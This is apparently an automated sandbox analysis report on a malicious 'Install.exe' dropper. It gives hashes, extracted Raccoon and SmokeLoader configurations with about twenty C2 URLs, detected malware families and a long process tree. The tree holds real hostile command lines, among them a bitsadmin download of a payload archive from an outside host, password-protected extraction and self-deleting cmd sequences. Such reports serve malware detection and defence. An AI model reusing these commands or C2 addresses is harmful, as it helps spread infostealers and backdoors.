Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1801s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-04-2021 19:10

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2712
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2672
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2404
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • C:\Users\Admin\AppData\Local\Temp\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:3616
          • C:\Users\Admin\AppData\Local\Temp\is-AHKU8.tmp\Install.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-AHKU8.tmp\Install.tmp" /SL5="$40050,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2448
            • C:\Users\Admin\AppData\Local\Temp\is-CF66S.tmp\Ultra.exe
              "C:\Users\Admin\AppData\Local\Temp\is-CF66S.tmp\Ultra.exe" /S /UID=burnerch1
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3456
              • C:\Program Files\Microsoft Office\ADVUYDANVS\ultramediaburner.exe
                "C:\Program Files\Microsoft Office\ADVUYDANVS\ultramediaburner.exe" /VERYSILENT
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:508
                • C:\Users\Admin\AppData\Local\Temp\is-5C4MG.tmp\ultramediaburner.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-5C4MG.tmp\ultramediaburner.tmp" /SL5="$9004E,281924,62464,C:\Program Files\Microsoft Office\ADVUYDANVS\ultramediaburner.exe" /VERYSILENT
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1332
                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                    6⤵
                    • Executes dropped EXE
                    PID:2380
              • C:\Users\Admin\AppData\Local\Temp\8e-c8aca-316-31f8f-a45f62f266852\Nasugujaetae.exe
                "C:\Users\Admin\AppData\Local\Temp\8e-c8aca-316-31f8f-a45f62f266852\Nasugujaetae.exe"
                4⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                PID:3996
              • C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Xaqilyjiri.exe
                "C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Xaqilyjiri.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3844
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uejaxpph.lig\instEU.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4604
                  • C:\Users\Admin\AppData\Local\Temp\uejaxpph.lig\instEU.exe
                    C:\Users\Admin\AppData\Local\Temp\uejaxpph.lig\instEU.exe
                    6⤵
                    • Executes dropped EXE
                    PID:4808
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1xuavs0.c3j\md1_1eaf.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4964
                  • C:\Users\Admin\AppData\Local\Temp\h1xuavs0.c3j\md1_1eaf.exe
                    C:\Users\Admin\AppData\Local\Temp\h1xuavs0.c3j\md1_1eaf.exe
                    6⤵
                      PID:5028
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pslojvhv.kb4\google-game.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4832
                    • C:\Users\Admin\AppData\Local\Temp\pslojvhv.kb4\google-game.exe
                      C:\Users\Admin\AppData\Local\Temp\pslojvhv.kb4\google-game.exe
                      6⤵
                        PID:4416
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          7⤵
                            PID:4364
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbchec2v.wiy\y1.exe & exit
                        5⤵
                          PID:4516
                          • C:\Users\Admin\AppData\Local\Temp\tbchec2v.wiy\y1.exe
                            C:\Users\Admin\AppData\Local\Temp\tbchec2v.wiy\y1.exe
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2152
                            • C:\Users\Admin\AppData\Local\Temp\CywsdfAXdp.exe
                              "C:\Users\Admin\AppData\Local\Temp\CywsdfAXdp.exe"
                              7⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              PID:1528
                              • C:\Users\Admin\AppData\Roaming\1619205365582.exe
                                "C:\Users\Admin\AppData\Roaming\1619205365582.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619205365582.txt"
                                8⤵
                                • Executes dropped EXE
                                PID:5752
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\CywsdfAXdp.exe"
                                8⤵
                                  PID:6000
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1 -n 3
                                    9⤵
                                    • Runs ping.exe
                                    PID:4516
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\tbchec2v.wiy\y1.exe"
                                7⤵
                                  PID:5856
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Executes dropped EXE
                                    • Delays execution with timeout.exe
                                    • Modifies data under HKEY_USERS
                                    PID:5228
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\smhfetlc.vho\inst.exe & exit
                              5⤵
                                PID:4280
                                • C:\Users\Admin\AppData\Local\Temp\smhfetlc.vho\inst.exe
                                  C:\Users\Admin\AppData\Local\Temp\smhfetlc.vho\inst.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4364
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3fwons24.0wk\SunLabsPlayer.exe /S & exit
                                5⤵
                                  PID:4684
                                  • C:\Users\Admin\AppData\Local\Temp\3fwons24.0wk\SunLabsPlayer.exe
                                    C:\Users\Admin\AppData\Local\Temp\3fwons24.0wk\SunLabsPlayer.exe /S
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Drops file in Program Files directory
                                    PID:5256
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                      7⤵
                                        PID:6100
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                        7⤵
                                          PID:6084
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                          7⤵
                                            PID:3980
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                            7⤵
                                              PID:6112
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5536
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5868
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                  7⤵
                                                  • Checks for any installed AV software in registry
                                                  PID:4356
                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                  7⤵
                                                  • Download via BitsAdmin
                                                  PID:3048
                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  PID:5420
                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4924
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5928
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:2400
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:2060
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:2724
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5628
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                            7⤵
                                                            • Loads dropped DLL
                                                            PID:2112
                                                            • C:\Windows\system32\rundll32.exe
                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Drops file in System32 directory
                                                              PID:5280
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5404
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:2272
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4484
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:6068
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvA187.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5492
                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:5876
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzxunarp.atz\GcleanerWW.exe /mixone & exit
                                                                  5⤵
                                                                    PID:4820
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe & exit
                                                                    5⤵
                                                                      PID:5276
                                                                      • C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5712
                                                                        • C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5808
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eceuescn.jb2\c7ae36fa.exe & exit
                                                                      5⤵
                                                                        PID:5468
                                                                        • C:\Users\Admin\AppData\Local\Temp\eceuescn.jb2\c7ae36fa.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\eceuescn.jb2\c7ae36fa.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5800
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ntrujo5c.l3j\app.exe /8-2222 & exit
                                                                        5⤵
                                                                          PID:5592
                                                                          • C:\Users\Admin\AppData\Local\Temp\ntrujo5c.l3j\app.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\ntrujo5c.l3j\app.exe /8-2222
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5908
                                                                            • C:\Users\Admin\AppData\Local\Temp\ntrujo5c.l3j\app.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\ntrujo5c.l3j\app.exe" /8-2222
                                                                              7⤵
                                                                                PID:5228
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                    1⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3984
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Checks processor information in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:4592
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                    1⤵
                                                                      PID:1896
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                      1⤵
                                                                        PID:1456
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                        1⤵
                                                                          PID:1272
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                          1⤵
                                                                            PID:1264
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                            1⤵
                                                                              PID:1068
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:948
                                                                              • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:6136
                                                                                • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:4572
                                                                              • C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:6032
                                                                              • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3972
                                                                                • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:3932
                                                                              • C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:1424
                                                                              • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:2336
                                                                                • C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  C:\Users\Admin\AppData\Roaming\tgjevsc
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:3404
                                                                              • C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                C:\Users\Admin\AppData\Roaming\rajevsc
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5204
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                              1⤵
                                                                                PID:1000
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                1⤵
                                                                                • Drops file in Windows directory
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3860
                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                PID:2228
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4988
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5116
                                                                              • C:\Windows\system32\DllHost.exe
                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4416
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:5144
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                1⤵
                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                PID:5900
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:4548
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:1300
                                                                              • C:\Users\Admin\AppData\Local\Temp\6EA9.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\6EA9.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:2184
